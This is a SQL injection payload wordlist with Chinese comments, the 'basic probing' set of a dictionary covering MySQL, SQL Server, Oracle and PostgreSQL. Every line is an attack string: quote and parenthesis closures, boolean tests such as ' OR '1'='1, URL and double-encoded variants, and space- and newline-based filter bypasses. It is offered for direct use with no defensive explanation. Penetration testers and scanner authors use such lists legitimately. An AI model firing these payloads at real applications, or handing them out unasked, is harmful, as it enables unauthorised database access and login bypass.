# ============================================================
# SQL Injection Payload Dictionary — 01 基础探测类
# 用途: 判断是否存在 SQL 注入漏洞
# 适用: MySQL / SQL Server / Oracle / PostgreSQL
# 说明: 通过闭合引号 + 真假逻辑探测注入点
# ============================================================

# ---- 单引号闭合 ----
'
%27
%27--
%27--+
%27#
%27%23
%27--

# ---- 双引号闭合 ----
"
%22
%22--
%22#

# ---- 布尔判断 ----
%27AND 1=1--
%27AND 1=2--
%27OR 1=1--
%27OR 1=2--

# ---- 字符串闭合判断 ----
%27AND '1'='1
%27AND '1'='2
%27OR '1'='1
%27OR '1'='2

# ---- 括号闭合 ----
%27)AND 1=1--
%27)OR 1=1--
%27))AND 1=1--
%27))OR 1=1--

# ---- URL 编码变形 ----
%27%2b%2b
%27%3b--

# ---- 编码二次解码 ----
%2527
%2522

# ---- 无空格绕过 ----
%27OR(1=1)--
%27AND(1=1)--

# ---- 注释换行绕过 ----
%27%0aOR%0a1=1--
%27%0d%0aOR%0a1=1--

# ---- 简单绕过类 ----
' OR 1=1
' OR 1=1 --
' OR '1'='1
' OR '1'='1'--
" OR 1=1
" OR 1=1 --
" OR "1"="1
" OR "1"="1"--
' OR 1=1#
' OR '1'='1'#
" OR "1"="1"#
'or'1=1
'or'1=1'--
') OR ('1'='1
') OR 1=1--
